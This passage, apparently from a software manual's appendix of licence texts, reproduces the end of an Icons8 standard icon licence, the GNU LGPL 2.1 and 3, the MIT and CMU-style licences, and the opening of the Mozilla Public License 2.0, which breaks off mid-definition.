Agreement to insert the icons into their own personal artwork, or software\napplication. If the Licensee requires distribution of the icons to coworkers or team-members in a raw form (such as PNG,\nSVG, EPS, or PDF formats), then a separate license may be purchased per user. Please contact customer service at:\n44\nhttps://icons8.com/contact for additional information on how to purchase multiple licenses.\nYour use of any Licensed Content in a manner not permitted under terms of this Agreement, constitutes copyright\ninfringement, and we shall be entitled to exercise any and all rights and remedies in order to enforce these terms. You\nunderstand and agree to be liable and responsible for any and all damages resulting from said infringement, including but\nnot limited to legal and attorney fees.\nYou are responsible for any and all appropriate sales or use tax imposed by any government authority or jurisdiction as a\nresult of the license granted to you by Icons8.\nLicense Expiration\nThis Standard License begins immediately upon the licensee’s acceptance and purchase of any licensed material, and is\nvalid for the term specified within your particular licensing package that you agreed to upon purchase (i.e. “licensing period”).\nThis license covers the following aspects of the licensed material:\nNew features, fixes, and improvements to the software and API\nNew Icons\nEmail support\nAfter expiration and termination of this Standard License, the following features shall remain and be applicable to:\nLicensed materials created before Expiration;\nUsing our web and desktop software with the Licensed Materials created prior to Expiration;\nOnce terminated or expired, this License Agreement shall not apply to:\nNew icons, or newly purchased licensed materials;\nCustomer Support\nThe licensee must obtain another license for any and all newly purchased Licensed Materials.\nLicensee Warranty\nThe Licensee warrants and agrees to be responsible for the Licensed Materials. Under the terms of this Standard License,\nLicensee shall not permit the unauthorized display, distribution, use, or sharing of any licensed materials. The Licensee also\nagrees:\nTo indemnify and hold our company harmless from any and all: actions, proceedings, claims, unforeseen third party claims,\ndemands, costs (including without restriction any legal costs, fees, or expenses), awards, and damages arising directly or\nindirectly from this agreement, or as a result of any breach or non-performance of this agreement by the Licensee.\nNot to assign, transfer, or sublicense this agreement, or permit the unauthorized use of Licensed Materials, or any portion\nthereof for any purpose;\nNot to assign or transfer it’s duties or obligations under this agreement, nor to loan, rent, assign, or transfer any Licensing\nrights to any other person or entity;\nThat the Licensed Materials shall not infringe upon any third party rights whatsoever, and any liability for the infringement of\nthird party rights shall rest with the Licensee.\nLicensor Warranty\nPursuant to the terms of this Agreement and your purchased license, we warrant that the Licensed Content will not infringe\non any copyright, or intellectual property rights of any third party.\nYOU UNDERSTAND AND AGREE THAT ANY AND ALL LICENSED CONTENT IS PROVIDED “AS IS” WITHOUT\nREPRESENTATION, WARRANTY OR CONDITION OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, BUT\nNOT LIMITED TO THE IMPLIED WARRANTIES, REPRESENTATIONS, OR CONDITIONS OF MERCHANTABILITY, OR\nFITNESS FOR A PARTICULAR PURPOSE. WE DO NOT WARRANT NOR GUARANTEE THAT THE CONTENT WILL\nMEET YOUR REQUIREMENTS OR THAT ITS USE WILL BE\nUNINTERRUPTED OR ERROR FREE. THE LICENSEE BEARS ALL RISK FOR USE OF SAID CONTENT.\nSHOULD THE CONTENT PROVE DEFECTIVE, YOU ASSUME ALL RISK AND COST FOR CORRECTIONS. IF YOU ARE\nDOWNLOADING CONTENT THAT IS IN A FLASH FORMAT OR FILE, EXCEPT AS EXPRESSLY PROVIDED HEREIN,\nWE MAKE NO REPRESENTATION OR WARRANTY RESPECTING THE LICENSED CONTENT WHATSOEVER,\nWHETHER AS TO OWNERSHIP, TECHNICAL OR LEGAL COMPLIANCE, OR OTHERWISE.\nIntellectual Property\nLicensed Material and all Icons are owned by Icons8 and are protected by U.S. Copyright law, as well as laws related to\nintellectual property rights. No title or intellectual property rights to the Licensed Content are transferred or assigned to the\nLicensee. Licensor retains all rights not expressly granted by this License Agreement.\nSome of the Licensed Material may contain copyrighted content such as trademarks and/or movie characters. These icons\nshall be used in accordance with accepted trademark practice, as well as a professional standard of care.\n45\nYou may be required to identify trademark owner's name, under the provisions of this Agreement.\nTrademarks may only be used to identify printed or electronic material produced by the Icons. You understand and agree\nthat use of any trademark or service mark, does not give you any rights of ownership in that trademark. Except as otherwise\nstated herein, this License Agreement does not grant you any intellectual property rights, nor rights to royalties to the\nLicensed Materials.\nLimited Liability\nAT NO TIME SHALL ANY OF OUR REPRESENTATIVES, AFFILIATES, CONTENT PROVIDERS, OR THEIR\nRESPECTIVE DIRECTORS, OFFICERS, EMPLOYEES, OR AGENTS, BE LIABLE FOR ANY INCIDENTAL, INDIRECT,\nPUNITIVE, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING BUT NOT LIMITED TO LOSS OF PROFITS,\nINTERRUPTION, LOSS OF BUSINESS INFORMATION, OR ANY OTHER PECUNIARY LOSS) IN CONNECTION WITH\nANY CLAIM, LOSS, DAMAGE, OR OTHER PROCEEDING ARISING UNDER THE TERMS OF THIS AGREEMENT,\nINCLUDING WITHOUT LIMITATION YOUR USE OF, RELIANCE UPON, ACCESS TO, OR EXPLOITATION OF THE\nCONTENT, OR ANY PART THEREOF, OR ANY RIGHTS GRANTED TO YOU HEREUNDER, EVEN IF WE HAVE BEEN\nADVISED OF THE POSSIBILITY OF SUCH DAMAGES, WHETHER THE ACTION IS BASED ON CONTRACT, TORT\n(INCLUDING NEGLIGENCE), INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR OTHERWISE. NO ACTION,\nREGARDLESS OF FORM OR NATURE, ARISING OUT OF THIS AGREEMENT MAY BE\nBROUGHT BY OR ON BEHALF OF YOU MORE THAN ONE (1) YEAR AFTER THE CAUSE OF ACTION FIRST AROSE.\nWE SHALL NOT BE LIABLE AT ANY TIME FOR ANY DAMAGES, COSTS OR LOSSES ARISING AS A RESULT OF\nMODIFICATIONS YOU HAVE MADE TO THE LICENSED CONTENT.\nNOTWITHSTANDING ANY OTHER TERMS UNDER THIS AGREEMENT, THE TOTAL MAXIMUM AGGREGATE\nLIABILITY UNDER THIS AGREEMENT AND ANY OTHER AGREEMENT UNDER WHICH WE HAVE LICENSED THE\nSAME CONTENT, REGARDLESS OF FILE SIZE, OR YOUR USE/EXPLOITATION OF ANY OR ALL LICENSED\nCONTENT IN ANY MANNER, OUR AGGREGATE LIABILITY SHALL BE LIMITED TO TEN ($10.00) US DOLLARS PER\nLICENSED CONTENT. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OR EXCLUSION OF LIABILITY FOR\nINCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THE ABOVE LIMITATION OR EXCLUSION MAY NOT APPLY TO\nYOU.\nTermination and Breach\nIf the Licensee violates any terms of this Agreement, it shall be construed as a “breach”. In the event of breach, the Licensor\nshall give Licensee written notice of breach or default. Licensee shall have seven (7) days in order to cure the default. If\nLicensee timely fails to cure the default, then this Agreement is deemed to have been automatically terminated, without any\nfurther notice to Licensee.\nLicensee acknowledges and agrees to be responsible and liable for any and all costs, fees, and legal fees, which Licensor\nmay incur as a result of compelling Licensee’s performance under this Agreement.\nDisputes\nAny and all disputes regarding these terms shall be resolved in a professional and business-like manner, absent resolution,\ndisputes shall be resolved by binding mediation, with the parties agreeing to share the cost and choice of an unbiased, third\nparty mediator.\nThe prevailing party shall be entitled to reimbursement of any and all costs and fees, including but not limited to attorney’s\nfees.\nGoverning Law and General Provisions\nThis Agreement will be governed by the laws in force in The United States of America and Delaware excluding the\napplication of its conflicts of law rules. This Agreement will not be governed by the United Nations Convention on Contracts\nfor the International Sale of Goods, (C.I.S.G.) the application of which is expressly excluded.\nIf any part of this Agreement is found void and unenforceable, it will not affect the validity of the balance of the Agreement,\nwhich shall remain valid and enforceable according to its terms.\nContact\nhttps://icons8.com/contact\nwedraw@icons8.com\n+1 (724) 426-6708\n46\nGNU Lesser General Public License Version 2.1\nFebruary 1999\nCopyright (C) 1991, 1999 Free Software Foundation, Inc. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\nEveryone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.\n[This is the first released version of the Lesser GPL. It also counts as the successor of the GNU Library Public License,\nversion 2, hence the version number 2.1.]\nPreamble\nThe licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU\nGeneral Public Licenses are intended to guarantee your freedom to share and change free software--to make sure the\nsoftware is free for all its users.\nThis license, the Lesser General Public License, applies to some specially designated software packages--typically\nlibraries--of the Free Software Foundation and other authors who decide to use it. You can use it too, but we suggest you\nfirst think carefully about whether this license or the ordinary General Public License is the better strategy to use in any\nparticular case, based on the explanations below.\nWhen we speak of free software, we are referring to freedom of use, not price. Our General Public Licenses are designed to\nmake sure that you have the freedom to distribute copies of free software (and charge for this service if you wish); that you\nreceive source code or can get it if you want it; that you can change the software and use pieces of it in new free programs;\nand that you are informed that you can do these things.\nTo protect your rights, we need to make restrictions that forbid distributors to deny you these rights or to ask you to surrender\nthese rights. These restrictions translate to certain responsibilities for you if you distribute copies of the library or if you\nmodify it.\nFor example, if you distribute copies of the library, whether gratis or for a fee, you must give the recipients all the rights that\nwe gave you. You must make sure that they, too, receive or can get the source code. If you link other code with the library,\nyou must provide complete object files to the recipients, so that they can relink them with the library after making changes to\nthe library and recompiling it. And you must show them these terms so they know their rights.\nWe protect your rights with a two-step method: (1) we copyright the library, and (2) we offer you this license, which gives you\nlegal permission to copy, distribute and/or modify the library.\nTo protect each distributor, we want to make it very clear that there is no warranty for the free library. Also, if the library is\nmodified by someone else and passed on, the recipients should know that what they have is not the original version, so that\nthe original author's reputation will not be affected by problems that might be introduced by others.\nFinally, software patents pose a constant threat to the existence of any free program. We wish to make sure that a company\ncannot effectively restrict the users of a free program by obtaining a restrictive license from a patent holder. Therefore, we\ninsist that any patent license obtained for a version of the library must be consistent with the full freedom of use specified in\nthis license.\nMost GNU software, including some libraries, is covered by the ordinary GNU General Public License. This license, the GNU\nLesser General Public License, applies to certain designated libraries, and is quite different from the ordinary General Public\nLicense. We use this license for certain libraries in order to permit linking those libraries into non-free programs.\nWhen a program is linked with a library, whether statically or using a shared library, the combination of the two is legally\nspeaking a combined work, a derivative of the original library. The ordinary General Public License therefore permits such\nlinking only if the entire combination fits its criteria of freedom. The Lesser General Public License permits more lax criteria\nfor linking other code with the library.\n47\nWe call this license the \"Lesser\" General Public License because it does Less to protect the user's freedom than the ordinary\nGeneral Public License. It also provides other free software developers Less of an advantage over competing non-free\nprograms. These disadvantages are the reason we use the ordinary General Public License for many libraries. However, the\nLesser license provides advantages in certain special circumstances.\nFor example, on rare occasions, there may be a special need to encourage the widest possible use of a certain library, so\nthat it becomes a de-facto standard. To achieve this, non-free programs must be allowed to use the library. A more frequent\ncase is that a free library does the same job as widely used non-free libraries. In this case, there is little to gain by limiting the\nfree library to free software only, so we use the Lesser General Public License.\nIn other cases, permission to use a particular library in non-free programs enables a greater number of people to use a large\nbody of free software. For example, permission to use the GNU C Library in non-free programs enables many more people\nto use the whole GNU operating system, as well as its variant, the GNU/Linux operating system.\nAlthough the Lesser General Public License is Less protective of the users' freedom, it does ensure that the user of a\nprogram that is linked with the Library has the freedom and the wherewithal to run that program using a modified version of\nthe Library.\nThe precise terms and conditions for copying, distribution and modification follow. Pay close attention to the difference\nbetween a \"work based on the library\" and a \"work that uses the library\". The former contains code derived from the library,\nwhereas the latter must be combined with the library in order to run.\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n0. This License Agreement applies to any software library or other program which contains a notice placed by the copyright\nholder or other authorized party saying it may be distributed under the terms of this Lesser General Public License (also\ncalled \"this License\"). Each licensee is addressed as \"you\".\nA \"library\" means a collection of software functions and/or data prepared so as to be conveniently linked with application\nprograms (which use some of those functions and data) to form executables.\nThe \"Library\", below, refers to any such software library or work which has been distributed under these terms. A \"work\nbased on the Library\" means either the Library or any derivative work under copyright law: that is to say, a work containing\nthe Library or a portion of it, either verbatim or with modifications and/or translated straightforwardly into another language.\n(Hereinafter, translation is included without limitation in the term \"modification\".)\n\"Source code\" for a work means the preferred form of the work for making modifications to it. For a library, complete source\ncode means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used\nto control compilation and installation of the library.\nActivities other than copying, distribution and modification are not covered by this License; they are outside its scope. The\nact of running a program using the Library is not restricted, and output from such a program is covered only if its contents\nconstitute a work based on the Library (independent of the use of the Library in a tool for writing it). Whether that is true\ndepends on what the Library does and what the program that uses the Library does.\n1. You may copy and distribute verbatim copies of the Library's complete source code as you receive it, in any medium,\nprovided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of\nwarranty; keep intact all the notices that refer to this License and to the absence of any warranty; and distribute a copy of this\nLicense along with the Library.\nYou may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in\nexchange for a fee.\n2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy\nand distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these\nconditions:\n48\na) The modified work must itself be a software library.\nb) You must cause the files modified to carry prominent notices stating that you changed the files and the date of any\nchange.\nc) You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License.\nd) If a facility in the modified Library refers to a function or a table of data to be supplied by an application program that uses\nthe facility, other than as an argument passed when the facility is invoked, then you must make a good faith effort to ensure\nthat, in the event an application does not supply such function or table, the facility still operates, and performs whatever part\nof its purpose remains meaningful.\n(For example, a function in a library to compute square roots has a purpose that is entirely well-defined independent of the\napplication. Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be\noptional: if the application does not supply it, the square root function must still compute square roots.)\nThese requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the\nLibrary, and can be reasonably considered independent and separate works in themselves, then this License, and its terms,\ndo not apply to those sections when you distribute them as separate works. But when you distribute the same sections as\npart of a whole which is a work based on the Library, the distribution of the whole must be on the terms of this License,\nwhose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote\nit.\nThus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is\nto exercise the right to control the distribution of derivative or collective works based on the Library.\nIn addition, mere aggregation of another work not based on the Library with the Library (or with a work based on the Library)\non a volume of a storage or distribution medium does not bring the other work under the scope of this License.\n3. You may opt to apply the terms of the ordinary GNU General Public License instead of this License to a given copy of the\nLibrary. To do this, you must alter all the notices that refer to this License, so that they refer to the ordinary GNU General\nPublic License, version 2, instead of to this License. (If a newer version than version 2 of the ordinary GNU General Public\nLicense has appeared, then you can specify that version instead if you wish.) Do not make any other change in these\nnotices.\nOnce this change is made in a given copy, it is irreversible for that copy, so the ordinary GNU General Public License applies\nto all subsequent copies and derivative works made from that copy.\nThis option is useful when you wish to copy part of the code of the Library into a program that is not a library.\n4. You may copy and distribute the Library (or a portion or derivative of it, under Section 2) in object code or executable form\nunder the terms of Sections 1 and 2 above provided that you accompany it with the complete corresponding\nmachine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium\ncustomarily used for software interchange.\nIf distribution of object code is made by offering access to copy from a designated place, then offering equivalent access to\ncopy the source code from the same place satisfies the requirement to distribute the source code, even though third parties\nare not compelled to copy the source along with the object code.\n5. A program that contains no derivative of any portion of the Library, but is designed to work with the Library by being\ncompiled or linked with it, is called a \"work that uses the Library\". Such a work, in isolation, is not a derivative work of the\nLibrary, and therefore falls outside the scope of this License.\nHowever, linking a \"work that uses the Library\" with the Library creates an executable that is a derivative of the Library\n(because it contains portions of the Library), rather than a \"work that uses the library\". The executable is therefore covered\n49\nby this License. Section 6 states terms for distribution of such executables.\nWhen a \"work that uses the Library\" uses material from a header file that is part of the Library, the object code for the work\nmay be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the\nwork can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined\nby law.\nIf such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small\ninline functions (ten lines or less in length), then the use of the object file is unrestricted, regardless of whether it is legally a\nderivative work. (Executables containing this object code plus portions of the Library will still fall under Section 6.)\nOtherwise, if the work is a derivative of the Library, you may distribute the object code for the work under the terms of\nSection 6. Any executables containing that work also fall under Section 6, whether or not they are linked directly with the\nLibrary itself.\n6. As an exception to the Sections above, you may also combine or link a \"work that uses the Library\" with the Library to\nproduce a work containing portions of the Library, and distribute that work under terms of your choice, provided that the\nterms permit modification of the work for the customer's own use and reverse engineering for debugging such modifications.\nYou must give prominent notice with each copy of the work that the Library is used in it and that the Library and its use are\ncovered by this License. You must supply a copy of this License. If the work during execution displays copyright notices, you\nmust include the copyright notice for the Library among them, as well as a reference directing the user to the copy of this\nLicense. Also, you must do one of these things:\na) Accompany the work with the complete corresponding machine-readable source code for the Library including whatever\nchanges were used in the work (which must be distributed under Sections 1 and 2 above); and, if the work is an executable\nlinked with the Library, with the complete machine-readable \"work that uses the Library\", as object code and/or source code,\nso that the user can modify the Library and then relink to produce a modified executable containing the modified Library. (It is\nunderstood that the user who changes the contents of definitions files in the Library will not necessarily be able to recompile\nthe application to use the modified definitions.)\nb) Use a suitable shared library mechanism for linking with the Library. A suitable mechanism is one that (1) uses at run time\na copy of the library already present on the user's computer system, rather than copying library functions into the executable,\nand (2) will operate properly with a modified version of the library, if the user installs one, as long as the modified version is\ninterface-compatible with the version that the work was made with.\nc) Accompany the work with a written offer, valid for at least three years, to give the same user the materials specified in\nSubsection 6a, above, for a charge no more than the cost of performing this distribution.\nd) If distribution of the work is made by offering access to copy from a designated place, offer equivalent access to copy the\nabove specified materials from the same place.\ne) Verify that the user has already received a copy of these materials or that you have already sent this user a copy.\nFor an executable, the required form of the \"work that uses the Library\" must include any data and utility programs needed\nfor reproducing the executable from it. However, as a special exception, the materials to be distributed need not include\nanything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on)\nof the operating system on which the executable runs, unless that component itself accompanies the executable.\nIt may happen that this requirement contradicts the license restrictions of other proprietary libraries that do not normally\naccompany the operating system. Such a contradiction means you cannot use both them and the Library together in an\nexecutable that you distribute.\n7. You may place library facilities that are a work based on the Library side-by-side in a single library together with other\nlibrary facilities not covered by this License, and distribute such a combined library, provided that the separate distribution of\nthe work based on the Library and of the other library facilities is otherwise permitted, and provided that you do these two\nthings:\n50\na) Accompany the combined library with a copy of the same work based on the Library, uncombined with any other library\nfacilities. This must be distributed under the terms of the Sections above.\nb) Give prominent notice with the combined library of the fact that part of it is a work based on the Library, and explaining\nwhere to find the accompanying uncombined form of the same work.\n8. You may not copy, modify, sublicense, link with, or distribute the Library except as expressly provided under this License.\nAny attempt otherwise to copy, modify, sublicense, link with, or distribute the Library is void, and will automatically terminate\nyour rights under this License. However, parties who have received copies, or rights, from you under this License will not\nhave their licenses terminated so long as such parties remain in full compliance.\n9. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to\nmodify or distribute the Library or its derivative works. These actions are prohibited by law if you do not accept this License.\nTherefore, by modifying or distributing the Library (or any work based on the Library), you indicate your acceptance of this\nLicense to do so, and all its terms and conditions for copying, distributing or modifying the Library or works based on it.\n10. Each time you redistribute the Library (or any work based on the Library), the recipient automatically receives a license\nfrom the original licensor to copy, distribute, link with or modify the Library subject to these terms and conditions. You may\nnot impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for\nenforcing compliance by third parties with this License.\n11. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent\nissues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of\nthis License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy\nsimultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not\ndistribute the Library at all. For example, if a patent license would not permit royalty-free redistribution of the Library by all\nthose who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would\nbe to refrain entirely from distribution of the Library.\nIf any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is\nintended to apply, and the section as a whole is intended to apply in other circumstances.\nIt is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of\nany such claims; this section has the sole purpose of protecting the integrity of the free software distribution system which is\nimplemented by public license practices. Many people have made generous contributions to the wide range of software\ndistributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he\nor she is willing to distribute software through any other system and a licensee cannot impose that choice.\nThis section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License.\n12. If the distribution and/or use of the Library is restricted in certain countries either by patents or by copyrighted interfaces,\nthe original copyright holder who places the Library under this License may add an explicit geographical distribution limitation\nexcluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this\nLicense incorporates the limitation as if written in the body of this License.\n13. The Free Software Foundation may publish revised and/or new versions of the Lesser General Public License from time\nto time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or\nconcerns.\nEach version is given a distinguishing version number. If the Library specifies a version number of this License which applies\nto it and \"any later version\", you have the option of following the terms and conditions either of that version or of any later\nversion published by the Free Software Foundation. If the Library does not specify a license version number, you may\nchoose any version ever published by the Free Software Foundation.\n14. If you wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with\n51\nthese, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to\nthe Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of\npreserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally.\nNO WARRANTY\n15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE LIBRARY, TO\nTHE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE\nCOPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY \"AS IS\" WITHOUT WARRANTY OF ANY\nKIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND\nPERFORMANCE OF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME THE\nCOST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT\nHOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED\nABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR\nCONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE LIBRARY (INCLUDING BUT\nNOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR\nTHIRD PARTIES OR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n52\nGNU Lesser General Public License Version 3\n29 June 2007\nCopyright (C) 2007 Free Software Foundation, Inc.\nEveryone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.\nThis version of the GNU Lesser General Public License incorporates the terms and conditions of version 3 of the GNU\nGeneral Public License, supplemented by the additional permissions listed below.\n0. Additional Definitions.\nAs used herein, “this License” refers to version 3 of the GNU Lesser General Public License, and the “GNU GPL” refers to\nversion 3 of the GNU General Public License.\n“The Library” refers to a covered work governed by this License, other than an Application or a Combined Work as defined\nbelow.\nAn “Application” is any work that makes use of an interface provided by the Library, but which is not otherwise based on the\nLibrary. Defining a subclass of a class defined by the Library is deemed a mode of using an interface provided by the Library.\nA “Combined Work” is a work produced by combining or linking an Application with the Library. The particular version of the\nLibrary with which the Combined Work was made is also called the “Linked Version”.\nThe “Minimal Corresponding Source” for a Combined Work means the Corresponding Source for the Combined Work,\nexcluding any source code for portions of the Combined Work that, considered in isolation, are based on the Application,\nand not on the Linked Version.\nThe “Corresponding Application Code” for a Combined Work means the object code and/or source code for the Application,\nincluding any data and utility programs needed for reproducing the Combined Work from the Application, but excluding the\nSystem Libraries of the Combined Work.\n1. Exception to Section 3 of the GNU GPL.\nYou may convey a covered work under sections 3 and 4 of this License without being bound by section 3 of the GNU GPL.\n2. Conveying Modified Versions.\nIf you modify a copy of the Library, and, in your modifications, a facility refers to a function or data to be supplied by an\nApplication that uses the facility (other than as an argument passed when the facility is invoked), then you may convey a\ncopy of the modified version:\na) under this License, provided that you make a good faith effort to ensure that, in the event an Application does not supply\nthe function or data, the facility still operates, and performs whatever part of its purpose remains meaningful, or\nb) under the GNU GPL, with none of the additional permissions of this License applicable to that copy.\n3. Object Code Incorporating Material from Library Header Files.\nThe object code form of an Application may incorporate material from a header file that is part of the Library. You may\nconvey such object code under terms of your choice, provided that, if the incorporated material is not limited to numerical\nparameters, data structure layouts and accessors, or small macros, inline functions and templates (ten or fewer lines in\nlength), you do both of the following:\na) Give prominent notice with each copy of the object code that the Library is used in it and that the Library and its use are\n53\ncovered by this License.\nb) Accompany the object code with a copy of the GNU GPL and this license document.\n4. Combined Works.\nYou may convey a Combined Work under terms of your choice that, taken together, effectively do not restrict modification of\nthe portions of the Library contained in the Combined Work and reverse engineering for debugging such modifications, if you\nalso do each of the following:\na) Give prominent notice with each copy of the Combined Work that the Library is used in it and that the Library and its use\nare covered by this License.\nb) Accompany the Combined Work with a copy of the GNU GPL and this license document.\nc) For a Combined Work that displays copyright notices during execution, include the copyright notice for the Library among\nthese notices, as well as a reference directing the user to the copies of the GNU GPL and this license document.\nd) Do one of the following:\n0) Convey the Minimal Corresponding Source under the terms of this License, and the Corresponding Application Code in a\nform suitable for, and under terms that permit, the user to recombine or relink the Application with a modified version of the\nLinked Version to produce a modified Combined Work, in the manner specified by section 6 of the GNU GPL for conveying\nCorresponding Source.\n1) Use a suitable shared library mechanism for linking with the Library. A suitable mechanism is one that (a) uses at run time\na copy of the Library already present on the user's computer system, and (b) will operate properly with a modified version of\nthe Library that is interface-compatible with the Linked Version.\ne) Provide Installation Information, but only if you would otherwise be required to provide such information under section 6 of\nthe GNU GPL, and only to the extent that such information is necessary to install and execute a modified version of the\nCombined Work produced by recombining or relinking the Application with a modified version of the Linked Version. (If you\nuse option 4d0, the Installation Information must accompany the Minimal Corresponding Source and Corresponding\nApplication Code. If you use option 4d1, you must provide the Installation Information in the manner specified by section 6 of\nthe GNU GPL for conveying Corresponding Source.)\n5. Combined Libraries.\nYou may place library facilities that are a work based on the Library side by side in a single library together with other library\nfacilities that are not Applications and are not covered by this License, and convey such a combined library under terms of\nyour choice, if you do both of the following:\na) Accompany the combined library with a copy of the same work based on the Library, uncombined with any other library\nfacilities, conveyed under the terms of this License.\nb) Give prominent notice with the combined library that part of it is a work based on the Library, and explaining where to find\nthe accompanying uncombined form of the same work.\n6. Revised Versions of the GNU Lesser General Public License.\nThe Free Software Foundation may publish revised and/or new versions of the GNU Lesser General Public License from\ntime to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new\nproblems or concerns.\nEach version is given a distinguishing version number. If the Library as you received it specifies that a certain numbered\nversion of the GNU Lesser General Public License “or any later version” applies to it, you have the option of following the\nterms and conditions either of that published version or of any later version published by the Free Software Foundation. If\nthe Library as you received it does not specify a version number of the GNU Lesser General Public License, you may\nchoose any version of the GNU Lesser General Public License ever published by the Free Software Foundation.\nIf the Library as you received it specifies that a proxy can decide whether future versions of the GNU Lesser General Public\nLicense shall apply, that proxy's public statement of acceptance of any version is permanent authorization for you to choose\nthat version for the Library.\n54\nThe MIT License\nCopyright\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation\nfiles (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify,\nmerge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING\nBUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\nNONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n55\nThe MIT License CMU Style\nCopyright 1989, 1991, 1992 by Carnegie Mellon University\nDerivative Work - 1996, 1998-2000\nCopyright 1996, 1998-2000 The Regents of the University of California\nAll Rights Reserved\nPermission to use, copy, modify and distribute this software and its\ndocumentation for any purpose and without fee is hereby granted,\nprovided that the above copyright notice appears in all copies and\nthat both that copyright notice and this permission notice appear in\nsupporting documentation, and that the name of CMU and The Regents of\nthe University of California not be used in advertising or publicity\npertaining to distribution of the software without specific written\npermission.\nCMU AND THE REGENTS OF THE UNIVERSITY OF CALIFORNIA DISCLAIM ALL\nWARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL CMU OR\nTHE REGENTS OF THE UNIVERSITY OF CALIFORNIA BE LIABLE FOR ANY SPECIAL,\nINDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING\nFROM THE LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF\nCONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN\nCONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n56\nMozilla Public License 2.0 (MPL-2.0)\n1. Definitions\n1.1. “Contributor”\nmeans each individual or legal entity that creates, contributes to the creation of, or owns Covered Software.\n1.2. “Contributor Version”\nmeans the combination of the Contributions of others (if any) used by a Contributor and that particular Contributor’s\nContribution.\n1.3. “Contribution”\nmeans Covered Software of a particular Contributor.\n1.4. “Covered 